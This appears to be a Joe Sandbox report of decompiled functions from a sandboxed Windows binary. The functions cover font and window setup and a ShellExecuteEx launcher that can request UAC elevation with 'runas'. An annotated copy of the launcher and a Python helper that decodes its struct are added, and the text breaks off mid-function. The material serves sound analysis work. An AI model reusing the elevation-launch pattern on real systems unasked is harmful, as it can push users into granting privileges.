                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714E71500
                                                    • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                    • API String ID: 457087618-999260334
                                                    • Opcode ID: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                    • Opcode Fuzzy Hash: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 89%
                                                    			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                    				char _v5;
                                                    				struct tagLOGFONTA _v65;
                                                    				struct tagLOGFONTA _v185;
                                                    				struct tagLOGFONTA _v245;
                                                    				void _v405;
                                                    				void* _t23;
                                                    				int _t27;
                                                    				void* _t30;
                                                    				intOrPtr _t38;
                                                    				struct HFONT__* _t41;
                                                    				struct HFONT__* _t45;
                                                    				struct HFONT__* _t49;
                                                    				intOrPtr _t52;
                                                    				intOrPtr _t54;
                                                    				void* _t57;
                                                    				void* _t72;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				intOrPtr _t76;
                                                    
                                                    				_t72 = __edi;
                                                    				_t74 = _t75;
                                                    				_t76 = _t75 + 0xfffffe6c;
                                                    				_t57 = __eax;
                                                    				_v5 = 0;
                                                    				if( *0x49ebb8 != 0) {
                                                    					_t54 =  *0x49ebb8; // 0x0
                                                    					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                                    				}
                                                    				_push(_t74);
                                                    				_push(0x4588e9);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t76;
                                                    				if( *0x49ebb8 != 0) {
                                                    					_t52 =  *0x49ebb8; // 0x0
                                                    					E0045AD24(_t52, 0);
                                                    				}
                                                    				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                    					_t23 = GetStockObject(0xd);
                                                    					_t7 = _t57 + 0x84; // 0x38004010
                                                    					E00424FCC( *_t7, _t23, _t72);
                                                    				} else {
                                                    					_t49 = CreateFontIndirectA( &_v65); // executed
                                                    					_t6 = _t57 + 0x84; // 0x38004010
                                                    					E00424FCC( *_t6, _t49, _t72);
                                                    				}
                                                    				_v405 = 0x154;
                                                    				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                                    				if(_t27 == 0) {
                                                    					_t14 = _t57 + 0x80; // 0x94000000
                                                    					E004250B0( *_t14, 8);
                                                    					_t30 = GetStockObject(0xd);
                                                    					_t15 = _t57 + 0x88; // 0x90000000
                                                    					E00424FCC( *_t15, _t30, _t72);
                                                    				} else {
                                                    					_t41 = CreateFontIndirectA( &_v185);
                                                    					_t11 = _t57 + 0x80; // 0x94000000
                                                    					E00424FCC( *_t11, _t41, _t72);
                                                    					_t45 = CreateFontIndirectA( &_v245);
                                                    					_t13 = _t57 + 0x88; // 0x90000000
                                                    					E00424FCC( *_t13, _t45, _t72);
                                                    				}
                                                    				_t16 = _t57 + 0x80; // 0x94000000
                                                    				E00424E10( *_t16, 0xff000017);
                                                    				_t17 = _t57 + 0x88; // 0x90000000
                                                    				E00424E10( *_t17, 0xff000007);
                                                    				 *[fs:eax] = 0xff000007;
                                                    				_push(0x4588f0);
                                                    				if( *0x49ebb8 != 0) {
                                                    					_t38 =  *0x49ebb8; // 0x0
                                                    					return E0045AD24(_t38, _v5);
                                                    				}
                                                    				return 0;
                                                    			}

                                                    Instruction addresses: 0x004587a4 0x004587a5 0x004587a7 0x004587ae 0x004587b0 0x004587bb 0x004587bd 0x004587c8 0x004587c8 0x004587cd 0x004587ce 0x004587d3 0x004587d6 0x004587e0 0x004587e4 0x004587e9 0x004587e9 0x004587ff 0x0045881b 0x00458822 0x00458828 0x00458801 0x00458805 0x0045880c 0x00458812 0x00458812 0x0045882d 0x00458844 0x0045884b 0x00458881 0x0045888c 0x00458893 0x0045889a 0x004588a0 0x0045884d 0x00458854 0x0045885b 0x00458861 0x0045886d 0x00458874 0x0045887a 0x0045887a 0x004588a5 0x004588b0 0x004588b5 0x004588c0 0x004588ca 0x004588cd 0x004588d9 0x004588de 0x00000000 0x004588e3 0x004588e8

                                                    APIs
                                                    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                    • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                    • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                    • GetStockObject.GDI32(0000000D), ref: 00458893
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                    • String ID:
                                                    • API String ID: 2891467149-0
                                                    • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                    • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                    				char _v8;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    				void* _t27;
                                                    				void* _t31;
                                                    				void* _t35;
                                                    				intOrPtr* _t43;
                                                    
                                                    				_t43 =  &_v8;
                                                    				_t20 =  *0x49bc20; // 0x0
                                                    				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                    				_t21 =  *0x49bc20; // 0x0
                                                    				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                    				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                    					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                    				}
                                                    				_t27 =  *0x49bc20; // 0x0
                                                    				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
                                                    				_t31 =  *0x49bc20; // 0x0
                                                    				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
                                                    				_t35 =  *0x49bc20; // 0x0
                                                    				 *0x49bc20 = 0; // executed
                                                    				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                    				return  *_t43;
                                                    			}

                                                    Instruction addresses: 0x00437d75 0x00437d78 0x00437d80 0x00437d86 0x00437d98 0x00437dad 0x00437dc8 0x00437dc8 0x00437dcd 0x00437ddf 0x00437de4 0x00437df6 0x00437e07 0x00437e0c 0x00437e1c 0x00437e24

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LongWindow$Prop
                                                    • String ID:
                                                    • API String ID: 3887896539-0
                                                    • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                    • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E00457FC8(char __edx, void* __edi) {
                                                    				char _v5;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __ebp;
                                                    				intOrPtr _t25;
                                                    				intOrPtr* _t28;
                                                    				intOrPtr* _t29;
                                                    				intOrPtr _t42;
                                                    				intOrPtr* _t45;
                                                    				intOrPtr _t56;
                                                    				intOrPtr _t57;
                                                    				intOrPtr _t58;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t62;
                                                    				void* _t63;
                                                    				char _t64;
                                                    				void* _t74;
                                                    				intOrPtr _t75;
                                                    				void* _t76;
                                                    				void* _t77;
                                                    
                                                    				_t74 = __edi;
                                                    				_t64 = __edx;
                                                    				if(__edx != 0) {
                                                    					_t77 = _t77 + 0xfffffff0;
                                                    					_t25 = E00403F10(_t25, _t76);
                                                    				}
                                                    				_v5 = _t64;
                                                    				_t62 = _t25;
                                                    				E00421B3C(_t63, 0);
                                                    				_t28 =  *0x49d878; // 0x49b510
                                                    				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                                    				 *_t28 = 0x45836c;
                                                    				_t29 =  *0x49d888; // 0x49b518
                                                    				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                                    				 *_t29 = 0x458378;
                                                    				E00458384(_t62);
                                                    				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                                    				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BBC(1);
                                                    				 *((intOrPtr*)(_t62 + 0x50)) = E00403BBC(1);
                                                    				 *((intOrPtr*)(_t62 + 0x54)) = E00403BBC(1);
                                                    				 *((intOrPtr*)(_t62 + 0x58)) = E00403BBC(1);
                                                    				_t42 = E00403BBC(1);
                                                    				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                                    				L00407638();
                                                    				_t75 = _t42;
                                                    				L00407380();
                                                    				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                                    				L00407888();
                                                    				_t11 = _t62 + 0x58; // 0x45122c6e
                                                    				_t45 =  *0x49dae4; // 0x49e91c
                                                    				 *((intOrPtr*)( *_t45))(0, 0, E004547A0,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                                    				 *((intOrPtr*)(_t62 + 0x84)) = E00424C3C(1);
                                                    				 *((intOrPtr*)(_t62 + 0x88)) = E00424C3C(1);
                                                    				 *((intOrPtr*)(_t62 + 0x80)) = E00424C3C(1);
                                                    				E004587A4(_t62, _t62, _t63, _t74);
                                                    				_t15 = _t62 + 0x84; // 0x38004010
                                                    				_t56 =  *_t15;
                                                    				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                                    				 *((intOrPtr*)(_t56 + 8)) = 0x458680;
                                                    				_t18 = _t62 + 0x88; // 0x90000000
                                                    				_t57 =  *_t18;
                                                    				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                                    				 *((intOrPtr*)(_t57 + 8)) = 0x458680;
                                                    				_t21 = _t62 + 0x80; // 0x94000000
                                                    				_t58 =  *_t21;
                                                    				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                                    				 *((intOrPtr*)(_t58 + 8)) = 0x458680;
                                                    				_t59 = _t62;
                                                    				if(_v5 != 0) {
                                                    					E00403F68(_t59);
                                                    					_pop( *[fs:0x0]);
                                                    				}
                                                    				return _t62;
                                                    			}
                                                    Instruction addresses, one per statement line of the C-Code above, in order: 0x00457fc8, 0x00457fc8, 0x00457fd0, 0x00457fd2, 0x00457fd5, 0x00457fd5, 0x00457fda, 0x00457fdd, 0x00457fe3, 0x00457fe8, 0x00457fed, 0x00457ff0, 0x00457ff6, 0x00457ffb, 0x00457ffe, 0x00458006, 0x00458012, 0x00458021, 0x00458030, 0x0045803f, 0x0045804e, 0x00458058, 0x0045805d, 0x00458062, 0x00458067, 0x0045806c, 0x00458071, 0x00458077, 0x0045807c, 0x0045808a, 0x00458091, 0x0045809f, 0x004580b1, 0x004580c3, 0x004580cb, 0x004580d0, 0x004580d0, 0x004580d6, 0x004580d9, 0x004580e0, 0x004580e0, 0x004580e6, 0x004580e9, 0x004580f0, 0x004580f0, 0x004580f6, 0x004580f9, 0x00458100, 0x00458106, 0x00458108, 0x0045810d, 0x00458114, 0x0045811d

                                                    APIs
                                                    • GetKeyboardLayout.USER32 ref: 0045800D
                                                    • 733AAC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                    • 733AAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                    • 733AB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380KeyboardLayout
                                                    • String ID: 5B
                                                    • API String ID: 648844651-3738334870
                                                    • Opcode ID: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                    • Opcode Fuzzy Hash: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00473490(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __eflags, char _a4, char _a8) {
                                                    				// Launch helper: __eax = owner HWND, __edx = file to run, __ecx = parameters,
                                                    				// _a4 = wait for the child to exit, _a8 = use the "runas" verb (UAC consent prompt).
                                                    				intOrPtr _v8;      // lpFile string
                                                    				char _v12;         // lpParameters string
                                                    				void* _v16;        // SHELLEXECUTEINFOA.hProcess   (+0x38)
                                                    				intOrPtr _v44;     // SHELLEXECUTEINFOA.nShow      (+0x1c)
                                                    				intOrPtr _v52;     // SHELLEXECUTEINFOA.lpParameters (+0x14)
                                                    				intOrPtr _v56;     // SHELLEXECUTEINFOA.lpFile     (+0x10)
                                                    				intOrPtr _v60;     // SHELLEXECUTEINFOA.lpVerb     (+0x0c)
                                                    				intOrPtr _v64;     // SHELLEXECUTEINFOA.hwnd       (+0x08)
                                                    				intOrPtr _v68;     // SHELLEXECUTEINFOA.fMask      (+0x04)
                                                    				char _v72;         // SHELLEXECUTEINFOA.cbSize, base of the 0x3c-byte struct
                                                    				char* _t33;
                                                    				intOrPtr _t43;
                                                    				intOrPtr _t52;
                                                    				void* _t56;
                                                    
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t43 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t56);
                                                    				_push(0x473564);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t56 + 0xffffffbc;            // install the SEH/try frame
                                                    				E004032B4( &_v72, 0x3c);                   // zero the SHELLEXECUTEINFOA
                                                    				_v72 = 0x3c;                               // cbSize = sizeof(SHELLEXECUTEINFOA); this 0x3c is the "<" in the Strings line below
                                                    				_v64 = _t43;                               // hwnd = owner window
                                                    				_v68 = 0x440;                              // fMask = SEE_MASK_NOCLOSEPROCESS (0x40) | SEE_MASK_FLAG_NO_UI (0x400)
                                                    				_v56 = E00404E80(_v8);                     // lpFile
                                                    				if(_a8 != 0) {
                                                    					_v60 = 0x473574;                       // lpVerb = "runas": requests elevation via the UAC prompt
                                                    				}
                                                    				if(_v12 != 0) {
                                                    					_v52 = E00404E80(_v12);                // lpParameters
                                                    				}
                                                    				_v44 = 1;                                  // nShow = SW_SHOWNORMAL
                                                    				_t33 =  &_v72;
                                                    				_push(_t33); // executed
                                                    				L0042EC28(); // executed                   // ShellExecuteExA(&sei); eax = BOOL result
                                                    				if(_t33 != 0) {                            // launch succeeded
                                                    					if(_a4 != 0 && _v16 != 0) {            // caller asked to wait and hProcess was returned
                                                    						while(WaitForSingleObject(_v16, 0x32) == 0x102) {   // 0x102 = WAIT_TIMEOUT
                                                    							Sleep(0x32);                   // poll every 50 ms until the child exits
                                                    						}
                                                    					}
                                                    				}
                                                    				_pop(_t52);
                                                    				 *[fs:eax] = _t52;                         // restore the previous SEH frame
                                                    				_push(0x47356b);
                                                    				return E004049E4( &_v12, 2);               // release the two string locals
                                                    			}
                                                    Instruction addresses, one per statement line of the C-Code above, in order: 0x00473497, 0x0047349a, 0x0047349d, 0x004734a2, 0x004734aa, 0x004734b1, 0x004734b2, 0x004734b7, 0x004734ba, 0x004734c7, 0x004734cc, 0x004734d3, 0x004734d6, 0x004734e5, 0x004734ec, 0x004734f3, 0x004734f3, 0x004734fa, 0x00473504, 0x00473504, 0x00473507, 0x0047350e, 0x00473511, 0x00473512, 0x00473519, 0x0047351f, 0x00473530, 0x0047352b, 0x0047352b, 0x00473530, 0x00473542, 0x0047354b, 0x0047354e, 0x00473551, 0x00473563

                                                    APIs
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                    • Sleep.KERNEL32(00000032,00000000,00000032,00000000,00473564), ref: 0047352B
                                                    • WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteObjectShellSingleSleepWait
                                                    • String ID: <$runas
                                                    • API String ID: 3175876650-1187129395
                                                    • Opcode ID: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction ID: 5aa402594196cc22e358d2c9fc2044dae5621586ffdb0388778a4eaf1ff726ef
                                                    • Opcode Fuzzy Hash: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                    • Instruction Fuzzy Hash: BC217FB0904208BBDB15DFAAD486BDEBBB8EB04304F50807BF508A6291D77C9B45DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
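The frame-to-struct mapping and flag decoding an analyst does by hand when reading E00473490 above, written out as an added Python helper; it is not code from the sample or from the Joe Sandbox report. It names the SHELLEXECUTEINFOA field behind each `_vN` local given that the struct starts at `_v72`, decodes the `fMask` value 0x440 into SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI, and parses a constructed 0x3c-byte struct image the way one would parse a dumped stack frame. Field offsets and constants are the documented 32-bit Win32 values; the lpVerb pointer 0x473574 is taken from the decompilation, and every other pointer in the constructed sample is made up.

```python
"""Decode the SHELLEXECUTEINFOA that E00473490 builds on its stack.

Added analyst helper (not sample or report code). Layout and flag values are
the documented 32-bit Win32 ones; sample bytes below are constructed.
"""
import struct

STRUCT_SIZE = 0x3C  # sizeof(SHELLEXECUTEINFOA) on 32-bit, the value stored in _v72

# (offset, field) for 32-bit SHELLEXECUTEINFOA; every field is 4 bytes wide.
SEI_FIELDS = [
    (0, "cbSize"), (4, "fMask"), (8, "hwnd"), (12, "lpVerb"), (16, "lpFile"),
    (20, "lpParameters"), (24, "lpDirectory"), (28, "nShow"), (32, "hInstApp"),
    (36, "lpIDList"), (40, "lpClass"), (44, "hkeyClass"), (48, "dwHotKey"),
    (52, "hIcon"), (56, "hProcess"),
]

# Single-bit fMask flags only, so bitwise decoding cannot mislabel composites
# such as SEE_MASK_INVOKEIDLIST (0xC) or SEE_MASK_CLASSKEY (0x3).
SEE_MASK_FLAGS = {
    0x00000001: "SEE_MASK_CLASSNAME", 0x00000004: "SEE_MASK_IDLIST",
    0x00000010: "SEE_MASK_ICON", 0x00000020: "SEE_MASK_HOTKEY",
    0x00000040: "SEE_MASK_NOCLOSEPROCESS", 0x00000080: "SEE_MASK_CONNECTNETDRV",
    0x00000100: "SEE_MASK_NOASYNC", 0x00000200: "SEE_MASK_DOENVSUBST",
    0x00000400: "SEE_MASK_FLAG_NO_UI", 0x00004000: "SEE_MASK_UNICODE",
    0x00008000: "SEE_MASK_NO_CONSOLE", 0x00100000: "SEE_MASK_ASYNCOK",
    0x00200000: "SEE_MASK_HMONITOR", 0x00400000: "SEE_MASK_NOZONECHECKS",
    0x00800000: "SEE_MASK_NOQUERYCLASSSTORE", 0x01000000: "SEE_MASK_WAITFORINPUTIDLE",
    0x08000000: "SEE_MASK_FLAG_LOG_USAGE",
}

SW_NAMES = {
    0: "SW_HIDE", 1: "SW_SHOWNORMAL", 2: "SW_SHOWMINIMIZED", 3: "SW_SHOWMAXIMIZED",
    4: "SW_SHOWNOACTIVATE", 5: "SW_SHOW", 6: "SW_MINIMIZE", 7: "SW_SHOWMINNOACTIVE",
    8: "SW_SHOWNA", 9: "SW_RESTORE", 10: "SW_SHOWDEFAULT",
}

WAIT_TIMEOUT = 0x102  # the value the decompiled loop compares WaitForSingleObject() against


def frame_field(base_var: int, var: int) -> str:
    """Map a decompiler local _vN ([ebp-N]) to the struct field it aliases.

    With the struct starting at _v<base_var>, local _v<var> sits at
    offset base_var - var inside it.
    """
    off = base_var - var
    for f_off, name in SEI_FIELDS:
        if f_off == off:
            return name
    raise ValueError(f"_v{var} is not the start of a field (offset {off})")


def decode_fmask(mask: int) -> list[str]:
    """Return the flag names set in fMask, lowest bit first; leftovers as hex."""
    names = []
    for bit, name in sorted(SEE_MASK_FLAGS.items()):
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(f"UNKNOWN_0x{mask:08x}")
    return names


def parse_sei(buf: bytes) -> dict:
    """Unpack a 32-bit SHELLEXECUTEINFOA image (e.g. from a dumped stack frame)."""
    if len(buf) < STRUCT_SIZE:
        raise ValueError("buffer shorter than SHELLEXECUTEINFOA")
    values = struct.unpack_from("<15I", buf, 0)
    sei = {name: val for (_, name), val in zip(SEI_FIELDS, values)}
    if sei["cbSize"] != STRUCT_SIZE:
        raise ValueError(f"cbSize 0x{sei['cbSize']:x} is not a 32-bit SHELLEXECUTEINFOA")
    return sei


def describe(sei: dict) -> dict:
    """Summarise the fields that matter for the launch/elevation behaviour."""
    flags = decode_fmask(sei["fMask"])
    return {
        "flags": flags,
        "nShow": SW_NAMES.get(sei["nShow"], f"SW_0x{sei['nShow']:x}"),
        # SEE_MASK_NOCLOSEPROCESS makes the shell hand back hProcess, which is
        # the handle the WaitForSingleObject(_v16, 0x32) loop later polls.
        "keeps_process_handle": "SEE_MASK_NOCLOSEPROCESS" in flags,
        "suppresses_error_ui": "SEE_MASK_FLAG_NO_UI" in flags,
        "verb_set": sei["lpVerb"] != 0,
    }


def build_sample_sei() -> bytes:
    """Constructed struct image mirroring what E00473490 writes.

    lpVerb 0x473574 comes from the decompilation; hwnd, lpFile and
    lpParameters are made-up addresses.
    """
    fields = [0] * 15
    fields[0] = STRUCT_SIZE   # cbSize
    fields[1] = 0x440         # fMask
    fields[2] = 0x000A0B2C    # hwnd (constructed)
    fields[3] = 0x473574      # lpVerb -> "runas"
    fields[4] = 0x00D0A100    # lpFile (constructed)
    fields[5] = 0x00D0A200    # lpParameters (constructed)
    fields[7] = 1             # nShow = SW_SHOWNORMAL
    return struct.pack("<15I", *fields)


if __name__ == "__main__":
    for v in (72, 68, 64, 60, 56, 52, 44, 16):
        print(f"_v{v:<3} -> {frame_field(72, v)}")
    print(describe(parse_sei(build_sample_sei())))
```

Because the struct is zeroed first and only these seven fields are written, a non-zero lpVerb of 0x473574 in a dumped frame is the tell for the elevation path, and the `<` the Strings line reports is just the 0x3c cbSize immediate, not a real string.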

                                                    C-Code - Quality: 89%
                                                    			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				signed char _t92;
                                                    				int _t98;
                                                    				int _t100;
                                                    				intOrPtr _t117;
                                                    				int _t122;
                                                    				intOrPtr _t155;
                                                    				void* _t164;
                                                    				signed char _t180;
                                                    				intOrPtr _t182;
                                                    				intOrPtr _t194;
                                                    				int _t199;
                                                    				intOrPtr _t203;
                                                    				void* _t204;
                                                    
                                                    				_t204 = __eflags;
                                                    				_t196 = __edi;
                                                    				_t202 = _t203;
                                                    				_v8 = __eax;
                                                    				E0043DF9C(_v8);
                                                    				_push(_t203);
                                                    				_push(0x453742);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t203;
                                                    				 *(_v8 + 0x268) = 0;
                                                    				 *(_v8 + 0x26c) = 0;
                                                    				 *(_v8 + 0x270) = 0;
                                                    				_t164 = 0;
                                                    				_t92 =  *0x49e665; // 0x0
                                                    				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                                    				E0043D6F8(_v8, 0, __edx, _t204); // executed
                                                    				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                                    					L12:
                                                    					_t98 =  *(_v8 + 0x268);
                                                    					_t213 = _t98;
                                                    					if(_t98 > 0) {
                                                    						E0043A998(_v8, _t98, _t196, _t213);
                                                    					}
                                                    					_t100 =  *(_v8 + 0x26c);
                                                    					_t214 = _t100;
                                                    					if(_t100 > 0) {
                                                    						E0043A9DC(_v8, _t100, _t196, _t214);
                                                    					}
                                                    					_t180 =  *0x453750; // 0x0
                                                    					 *(_v8 + 0x98) = _t180;
                                                    					_t215 = _t164;
                                                    					if(_t164 == 0) {
                                                    						E00452B4C(_v8, 1, 1);
                                                    						E004411C8(_v8, 1, 1, _t215);
                                                    					}
                                                    					E0043C130(_v8, 0, 0xb03d, 0);
                                                    					_pop(_t182);
                                                    					 *[fs:eax] = _t182;
                                                    					_push(0x453749);
                                                    					return E0043DFA4(_v8);
                                                    				} else {
                                                    					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                                    						_t194 =  *0x49ebbc; // 0x0
                                                    						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                                    							_t155 =  *0x49ebbc; // 0x0
                                                    							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                                    						}
                                                    					}
                                                    					_t117 =  *0x49ebbc; // 0x0
                                                    					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                                    					_t199 = E00453874(_v8);
                                                    					_t122 =  *(_v8 + 0x270);
                                                    					_t209 = _t199 - _t122;
                                                    					if(_t199 != _t122) {
                                                    						_t164 = 1;
                                                    						E00452B4C(_v8, _t122, _t199);
                                                    						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
                                                    						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                                    							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                                    						}
                                                    						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                                    							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                                    						}
                                                    						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
